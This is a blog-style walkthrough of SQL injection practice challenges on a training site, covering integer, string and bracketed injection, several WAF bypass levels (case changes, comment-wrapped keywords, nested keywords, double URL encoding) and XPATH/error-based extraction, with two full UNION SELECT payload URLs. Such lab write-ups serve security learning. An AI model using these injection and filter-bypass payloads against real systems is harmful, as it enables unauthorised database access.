Root0x00 SQL Injection.
Hello everyone,Let’s solve some sql injection challenges from root0x00 altervista site.click here to solve along with me.If you are new to sql injection Please read my blog before reading this.
we’ll be solving manually without using sqlmap.So let’s begin….
Integer Based SQL INJECTION:
First things first,it is very easy to solve.First let’s assume the query.
“SELECT * FROM users WHERE id=1”
SO,there is no single quote or double quote.So,there is no need to add a single quote or double quote.
So there are five columns in the table.Now let’s find the vulnerable columns.
So 2nd column is vulnerable so,Let’s print database(),user() and version()
So,it’s done…
String Based SQL INJECTION:
In string based the id parameter will be placed in between the single quote or doule quote.
So,Let’s assume the query.
“SELECT * FROM users WHERE id=“1” ”
Now let’s find out the no. of columns in the table.
Ok we have 5 columns in the table now let’s find out the vulnerable column.
OK now let’s find the database,user and version.
OK done….
String Based with Open Brackets SQL INJECTION:
In this,the id parameter is placed in between the open brackets and double quotes.
observe the image to understand it.So let’s assume the query
“ SELECT * FROM users WHERE id=(“1”) ”
Here a null byte is used to avoid the error.
OK as usual there are 5 columns From here i’ll skip this step so let’s find the vulnerable column.
Ok we got the vulnerable column so, just as mentioned above find out the database,user and version.
Ok it’s done…
Basic WAF Bypassing SQL Injection:
If a website is using waf it will block the requests that will contain ‘union’ or ‘select’ keywords.So,let’s go..Remember it’s a string type sql injection.
So you can observe it is blocking our request
OK we have successfully bypassed the firewall.from the above,we can see that the WAF is blocking only ‘select’, ‘ union’ words so i’ve changed them to random uppercase so, the firewall is bypassed.
Next find out the database,user and version.
It’s done.
WAF Bypassing SQL INJECTION (LEVEL:EASY~):
IN this case the union and select keywords are placed in between the comments to bypass the firewall.
“http://root0x00.altervista.org/sqli/waf2.php?id=10%27%20/*!union*/%20/*!select*/%201,2,3,4,5--+”
Ok It’s bypassed.Don’t forget to extract the database name,user and versin.
Ok done…..
WAF Bypassing SQL INJECTION (LEVEL:EASY~MEDIUM):
OK in this level we’ll how the firewall will remove the words that are present in the url
So observe the above error.It is saying that there is an error just before the 1st column.This error showed up because the union and select are removed from the url.To confirm that let’s add something to union to produce an error at union.
So,look at this,an error is produced at union statement but select is missing so From this error we came to know that this waf is removing the keywords from the request url.So to bypass this kind of WAF we’ll add union in the middle of another union.So the waf will search for union and remove it but the remaing will enter into the server and will give us the vulnerable column.
“http://root0x00.altervista.org/sqli/level.php?id=10%27%20uniUNIONon%20selSELECTect%201,2,3,4,5--++”
Ok we got the vulnerable column. So do your stuff here.
WAF Bypassing SQL INJECTION (LEVEL:MEDIUM~MEDIUM):
So,This level also removing the keywords from the req. url and addition to it.It also removes the white spaces.
To add white space between the words i just inserted a comment.
Now Find the database,user and version…
DOne…….
WAF Bypassing SQL INJECTION (LEVEL:MEDIUM~HARD):
This challenge f**ked me very badly.it took almost two days for me to complete it.While solving this challenge i’ve learned many things.So let’s begin.
First thing let’s find out the keywords Waf is blocking .
Ok union and select are the two words it’s blocking So let’s find a way to bypass it.
To bypass it we have to understand.First i’ve tried encode union and select in url format.So,first the server decode and block it because there are union and select keywords.So,for two days i’ve tried many different things to bypass it.But at last i came to know That server is filtering only one time what if i encode it twice .so i encode the union and select keywords twice in url So it is bypassed…
OK don’t forget to find the database,user and version..
HARD LEVEL DonE…
WAF Bypassing SQL INJECTION (LEVEL:MEDIUM~HARD):
It’s very easy level first let’s see what waf is filtering.
AS we done above the waf is removing the keywords like select and union.So i’ve added UNION and SELECT in the middle of union and select and aslo it is removing the white spaces.If we put comments as white spaces it will produce an error.So,we’ll place comments.
Don3….
XPATH SQL INJECTION (LEVEL:EASY):
So this way different from what we did before.in such cases we’ll use extractvalue to get the database.We’ll use this case when there is no vulnerable columns available or if the waf is blocking union keyword.So let’s gooooo……
XPATH SQL INJECTION 2 (LEVEL:EASY):
Here extractvalue is blocked by WAF so we’ll use updatexml method to extract the database these methods are also called query sql injection or double query sql injection.
OK DOn33….:)
Error Based SQL INJECTION:
Same as the XPATH SQL INJECTION.you can perform either xpath injection 1 or xpath injection 2.
Boolean Based Blind sql injection and time based sql injection are covered next writeup.Because they are very long and time taking one. it is already became a lengthy one. so i’ll make a seperate writeup for it.
THANKS……,:)
If everything is ok i’ll make a video on these challenges to explain them in a better way.
Follow for more stuff….
LinkedIN:https://www.linkedin.com/in/sampath-pendurthi/
Instagram:https://www.instagram.com/sampath.pendurthi/
HAPPY HACKING..
PEACE……✌️✌️
